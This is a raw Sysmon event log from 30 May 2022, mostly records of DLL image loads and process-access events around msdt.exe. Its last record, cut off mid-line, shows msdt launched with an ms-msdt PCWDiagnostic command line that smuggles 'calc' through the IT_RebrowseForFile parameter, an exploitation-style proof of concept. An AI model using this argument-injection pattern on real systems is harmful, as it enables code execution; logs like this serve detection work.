EventRecordID=100406 | EventID=10 (ProcessAccess) | UtcTime=2022-05-30 13:06:05.935 | SourceProcessGUID={326FD73D-A253-6294-0B00-000000005502} | SourceProcessId=632 | SourceThreadId=3688 | SourceImage=C:\Windows\system32\lsass.exe | TargetProcessGUID={326FD73D-C13D-6294-460B-000000005502} | TargetProcessId=6584 | TargetImage=C:\WINDOWS\system32\msdt.exe | GrantedAccess=0x1000 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventRecordID=100405 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\imm32.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Multi-User Windows IMM32 API Client DLL | OriginalFileName=imm32 | Hashes=MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002A,IMPHASH=C852E8FD14D356C81F834E318EEAD7FA
EventRecordID=100404 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\sspicli.dll | FileVersion=10.0.14393.5006 (rs1_release.220301-1704) | Description=Security Support Provider Interface | OriginalFileName=sspicli.dll | Hashes=MD5=F0258C58C8DC45AF9B5AAF9BA49E0C53,SHA256=8E1EAA39742CC0E97D615229E9C13C8447B8D115B4678A1F03BE3E8E20345521,IMPHASH=4B1C9487A6420C18F688F0EC5BEB6F33
EventRecordID=100403 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\cabinet.dll | FileVersion=5.00 (rs1_release.160715-1616) | Description=Microsoft® Cabinet File API | OriginalFileName=cabinet.dll | Hashes=MD5=08A4A2712DB2AE10E483FB74E46B0E73,SHA256=EEB32E3E4256CC9935227ACD5BA576B75F1F6FE3C818D2127513CB22F823FECB,IMPHASH=536E202FBC448C2C3B40D60D87620951
EventRecordID=100402 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\dui70.dll | FileVersion=10.0.14393.4169 (rs1_release.210107-1130) | Description=Windows DirectUI Engine | OriginalFileName=DUI70.DLL | Hashes=MD5=C3DC010AC7F5880CC7BE626566FC4130,SHA256=3ED6E9D0AF769B0BFBE94DFF4CC07A94A81271133FBB60C9EB02676C92FFB87E,IMPHASH=E76D3161885DD9D13E8514AFC7BF3853
EventRecordID=100401 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\winhttp.dll | FileVersion=10.0.14393.5006 (rs1_release.220301-1704) | Description=Windows HTTP Services | OriginalFileName=winhttp.dll | Hashes=MD5=54658E22186450946F304FE8BB408BBB,SHA256=1877859D1B72E18784982F4254C8DAE24F15186D3CA74680E7915E53D50800A1,IMPHASH=35501E61EE90F9745FCEA0F1F844350F
EventRecordID=100400 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\crypt32.dll | FileVersion=10.0.14393.4946 (rs1_release.220131-0721) | Description=Crypto API32 | OriginalFileName=CRYPT32.DLL | Hashes=MD5=341C44C830FB5D4FA58EF6276D9D2511,SHA256=988C82047689A625BA54959D2DB401A6891B9C00CF8A262842FBA2F032519283,IMPHASH=42B269CD88D7BD841B43BB1788792A62
EventRecordID=100399 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\msasn1.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=ASN.1 Runtime APIs | OriginalFileName=msasn1.dll | Hashes=MD5=299464D218A27B56684B715365D149FE,SHA256=2BFE4014E06552A9D4201EF9D1C605694AAF2B7B811265EFD91FC6D1C2D48242,IMPHASH=B6562243FBF394F03046E917C719260F
EventRecordID=100398 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\secur32.dll | FileVersion=10.0.14393.2273 (rs1_release_1.180427-1811) | Description=Security Support Provider Interface | OriginalFileName=secur32.dll | Hashes=MD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5,IMPHASH=0D8FF9DE2DA5C07D680347B1A098E759
EventRecordID=100397 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\duser.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Windows DirectUser Engine | OriginalFileName=DUser.DLL | Hashes=MD5=42D5E1F8641E9DCEE0D8751F6F7A8961,SHA256=9168110EF404BF179888AF4A0F02B2817F020BFB16351778F2DDD6915C92F190,IMPHASH=9134DC493583245CFD7E3B68926C19D0
EventRecordID=100396 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\wer.dll | FileVersion=10.0.14393.4704 (rs1_release.211004-1917) | Description=Windows Error Reporting DLL | OriginalFileName=wer.dll | Hashes=MD5=7E027B814172825204990B59AA353DB6,SHA256=F6F12530FE0312540C3C1310D618EE4D9005199E90E1BB9B385CA086C54E20C1,IMPHASH=D4255358570CE65AE9390E07B2795ADC
EventRecordID=100395 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\wintrust.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Microsoft Trust Verification APIs | OriginalFileName=WINTRUST.DLL | Hashes=MD5=55FCE44E89BDA2444619661FE50F43EE,SHA256=420CACA0D821E7E9F1D1E683E9899BC2F6D5A4AA06C8D4BB23335DD9490CC0F8,IMPHASH=8B8383FC3FA03C92F859A2AF899A52AD
EventRecordID=100394 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\comdlg32.dll | FileVersion=10.0.14393.4283 (rs1_release.210303-1802) | Description=Common Dialogs DLL | OriginalFileName=comdlg32.dll | Hashes=MD5=0DB1A588A248E852AD781AE14333A5C6,SHA256=6F9C36C2663B90439A1AEE74855C521FCBBDB8C7B88382C9464906F1691F65F6,IMPHASH=06716A63D3E6F97CB489B0D6810B3519
EventRecordID=100393 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\atl.dll | FileVersion=3.05.2284 | Description=ATL Module for Windows XP (Unicode) | Product=Microsoft (R) Visual C++ | OriginalFileName=ATL.DLL | Hashes=MD5=C1B73181019C1E1F28F4161B5F198B7F,SHA256=C3678504437D23910C18D3680B05B4E819A2229BDD0E1E0567186C70D814560D,IMPHASH=5500EF6AAEED0FAA2DE0F3B65E67DE20
EventRecordID=100392 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\uxtheme.dll | FileVersion=10.0.14393.4169 (rs1_release.210107-1130) | Description=Microsoft UxTheme Library | OriginalFileName=UxTheme.dll | Hashes=MD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12,IMPHASH=67E6A4C8E164C0229E3FF1626F1894C6
EventRecordID=100391 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\ole32.dll | FileVersion=10.0.14393.4651 (rs1_release.210911-1554) | Description=Microsoft OLE for Windows | OriginalFileName=OLE32.DLL | Hashes=MD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5
EventRecordID=100390 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\msvcp_win.dll | FileVersion=10.0.14393.2999 (rs1_release_inmarket.190520-1518) | Description=Microsoft® C Runtime Library | OriginalFileName=msvcp_win.dll | Hashes=MD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59A
EventRecordID=100389 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll | FileVersion=6.10 (rs1_release.210107-1130) | Description=User Experience Controls Library | OriginalFileName=comctl32.DLL | Hashes=MD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5,IMPHASH=C3F4A4DA2950075F09DD008B60FF567C
EventRecordID=100388 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\oleaut32.dll | FileVersion=10.0.14393.4402 (rs1_release.210426-1725) | Description=OLEAUT32.DLL | OriginalFileName=OLEAUT32.DLL | Hashes=MD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962F
EventRecordID=100387 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\profapi.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=User Profile Basic API | OriginalFileName=PROFAPI.DLL | Hashes=MD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899,IMPHASH=9060609FCB6C4120D4517877408A4A46
EventRecordID=100386 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\SHCore.dll | FileVersion=10.0.14393.5066 (rs1_release.220401-1841) | Description=SHCORE | OriginalFileName=SHCORE.dll | Hashes=MD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160,IMPHASH=3C09BDCE2388320645D7656AE2AC744C
EventRecordID=100385 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\kernel.appcore.dll | FileVersion=10.0.14393.2312 (rs1_release.180607-1919) | Description=AppModel API Host | OriginalFileName=kernel.appcore.dll | Hashes=MD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667D
EventRecordID=100384 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\shlwapi.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Shell Light-weight Utility Library | OriginalFileName=SHLWAPI.DLL | Hashes=MD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92,IMPHASH=9F3DE8492A7F075320A36332ACC9CAAF
EventRecordID=100383 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\powrprof.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Power Profile Helper DLL | OriginalFileName=POWRPROF.DLL | Hashes=MD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575,IMPHASH=CBD4A2FD581B65B4B1934DA291FA2B86
EventRecordID=100382 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\bcryptprimitives.dll | FileVersion=10.0.14393.4770 (rs1_release.211101-1440) | Description=Windows Cryptographic Primitives Library | OriginalFileName=bcryptprimitives.dll | Hashes=MD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5
EventRecordID=100381 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\ucrtbase.dll | FileVersion=10.0.14393.3659 (rs1_release_1.200410-1813) | Description=Microsoft® C Runtime Library | OriginalFileName=ucrtbase.dll | Hashes=MD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44C
EventRecordID=100380 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\combase.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Microsoft COM for Windows | OriginalFileName=COMBASE.DLL | Hashes=MD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1
EventRecordID=100379 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\windows.storage.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Microsoft WinRT Storage API | OriginalFileName=Windows.Storage.dll | Hashes=MD5=92988D33BA5299F42B23A1A69000FE4F,SHA256=C79560448589DB04ABB617D9FCA27D4C8E229F344BDCA937322BA8C3E7DBDD53,IMPHASH=A03B8A6BEC68C432E677F3D5E1DA4FAF
EventRecordID=100378 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\cfgmgr32.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Configuration Manager DLL | OriginalFileName=CFGMGR32.DLL | Hashes=MD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704,IMPHASH=1835EBC72F9ADB09C6FCFABC04AC9C89
EventRecordID=100377 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\shell32.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Windows Shell Common Dll | OriginalFileName=SHELL32.DLL | Hashes=MD5=F6FECBE8E5C78CD1621E3FF94040AC88,SHA256=128677FA3B8E693EB1C71D455A574CAFB3A0BB688FA1F813F17E476098C59C77,IMPHASH=0DFD49B61B099EE341A0B3D9B49EE90D
EventRecordID=100376 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\gdi32full.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=GDI Client DLL | OriginalFileName=gdi32 | Hashes=MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EE
EventRecordID=100375 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\gdi32.dll | FileVersion=10.0.14393.4169 (rs1_release.210107-1130) | Description=GDI Client DLL | OriginalFileName=gdi32 | Hashes=MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00C
EventRecordID=100374 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\win32u.dll | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Win32u | OriginalFileName=Win32u.DLL | Hashes=MD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000
EventRecordID=100373 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\user32.dll | FileVersion=10.0.14393.4169 (rs1_release.210107-1130) | Description=Multi-User Windows USER API Client DLL | OriginalFileName=user32 | Hashes=MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4
EventRecordID=100372 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\rpcrt4.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Remote Procedure Call Runtime | OriginalFileName=rpcrt4.dll | Hashes=MD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692
EventRecordID=100371 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.919 | ImageLoaded=C:\Windows\System32\sechost.dll | FileVersion=10.0.14393.5006 (rs1_release.220301-1704) | Description=Host for SCM/SDDL/LSA Lookup APIs | OriginalFileName=sechost.dll | Hashes=MD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40
EventRecordID=100370 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.903 | ImageLoaded=C:\Windows\System32\msvcrt.dll | FileVersion=7.0.14393.2457 (rs1_release_inmarket.180822-1743) | Description=Windows NT CRT DLL | OriginalFileName=msvcrt.dll | Hashes=MD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAF
EventRecordID=100369 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.903 | ImageLoaded=C:\Windows\System32\advapi32.dll | FileVersion=10.0.14393.4886 (rs1_release.220104-1735) | Description=Advanced Windows 32 Base API | OriginalFileName=advapi32.dll | Hashes=MD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EA
EventRecordID=100368 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.903 | ImageLoaded=C:\Windows\System32\KernelBase.dll | FileVersion=10.0.14393.5125 (rs1_release.220429-1732) | Description=Windows NT BASE API Client DLL | OriginalFileName=Kernelbase.dll | Hashes=MD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9
EventRecordID=100367 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.903 | ImageLoaded=C:\Windows\System32\kernel32.dll | FileVersion=10.0.14393.5066 (rs1_release.220401-1841) | Description=Windows NT BASE API Client DLL | OriginalFileName=kernel32 | Hashes=MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682
EventRecordID=100366 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.903 | ImageLoaded=C:\Windows\System32\ntdll.dll | FileVersion=10.0.14393.5006 (rs1_release.220301-1704) | Description=NT Layer DLL | OriginalFileName=ntdll.dll | Hashes=MD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000
EventRecordID=100365 | EventID=10 (ProcessAccess) | UtcTime=2022-05-30 13:06:05.903 | SourceProcessGUID={326FD73D-A254-6294-0C00-000000005502} | SourceProcessId=848 | SourceThreadId=2056 | SourceImage=C:\Windows\system32\svchost.exe | TargetProcessGUID={326FD73D-A262-6294-2700-000000005502} | TargetProcessId=2872 | TargetImage=C:\Windows\sysmon64.exe | GrantedAccess=0x1400 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventRecordID=100364 | EventID=7 (ImageLoad) | UtcTime=2022-05-30 13:06:05.903 | ImageLoaded=C:\Windows\System32\msdt.exe | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Diagnostics Troubleshooting Wizard | OriginalFileName=msdt.exe | Hashes=MD5=BB98CE2BD520AC69CB3D2F830974CABE,SHA256=C1237BDD2B574C1CBBB4A0D990773BBED5B6FE3BD14F8011C0E79F9CDDCA2B4E,IMPHASH=5D314604CE5F7FF83060B18832AA0D35
EventRecordID=100363 | EventID=10 (ProcessAccess) | UtcTime=2022-05-30 13:06:05.903 | SourceProcessGUID={326FD73D-A254-6294-0C00-000000005502} | SourceProcessId=848 | SourceThreadId=2056 | SourceImage=C:\Windows\system32\svchost.exe | TargetProcessGUID={326FD73D-A262-6294-2700-000000005502} | TargetProcessId=2872 | TargetImage=C:\Windows\sysmon64.exe | GrantedAccess=0x1400 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventRecordID=100362 | EventID=10 (ProcessAccess) | UtcTime=2022-05-30 13:06:05.903 | SourceProcessGUID={326FD73D-A254-6294-0C00-000000005502} | SourceProcessId=848 | SourceThreadId=2056 | SourceImage=C:\Windows\system32\svchost.exe | TargetProcessGUID={326FD73D-A262-6294-2700-000000005502} | TargetProcessId=2872 | TargetImage=C:\Windows\sysmon64.exe | GrantedAccess=0x1400 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventRecordID=100361 | EventID=10 (ProcessAccess) | UtcTime=2022-05-30 13:06:05.903 | SourceProcessGUID={326FD73D-A254-6294-0C00-000000005502} | SourceProcessId=848 | SourceThreadId=2056 | SourceImage=C:\Windows\system32\svchost.exe | TargetProcessGUID={326FD73D-A262-6294-2700-000000005502} | TargetProcessId=2872 | TargetImage=C:\Windows\sysmon64.exe | GrantedAccess=0x1400 | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventRecordID=100360 | EventID=10 (ProcessAccess) | UtcTime=2022-05-30 13:06:05.903 | SourceProcessGUID={326FD73D-A43E-6294-D800-000000005502} | SourceProcessId=2884 | SourceThreadId=3792 | SourceImage=C:\Windows\system32\csrss.exe | TargetProcessGUID={326FD73D-C13D-6294-460B-000000005502} | TargetProcessId=6584 | TargetImage=C:\WINDOWS\system32\msdt.exe | GrantedAccess=0x1fffff | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
EventRecordID=100359 | EventID=10 (ProcessAccess) | UtcTime=2022-05-30 13:06:05.903 | SourceProcessGUID={326FD73D-AAC7-6294-6108-000000005502} | SourceProcessId=5488 | SourceThreadId=5948 | SourceImage=C:\Windows\system32\cmd.exe | TargetProcessGUID={326FD73D-C13D-6294-460B-000000005502} | TargetProcessId=6584 | TargetImage=C:\WINDOWS\system32\msdt.exe | GrantedAccess=0x1fffff | CallTrace=C:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
EventRecordID=100358 | EventID=1 (ProcessCreate) | UtcTime=2022-05-30 13:06:05.911 | ProcessGuid={326FD73D-C13D-6294-460B-000000005502} | ProcessId=6584 | Image=C:\Windows\System32\msdt.exe | FileVersion=10.0.14393.0 (rs1_release.160715-1616) | Description=Diagnostics Troubleshooting Wizard | Product=Microsoft® Windows® Operating System | Company=Microsoft Corporation | OriginalFileName=msdt.exe | CommandLine="C:\WINDOWS\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=calc IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed 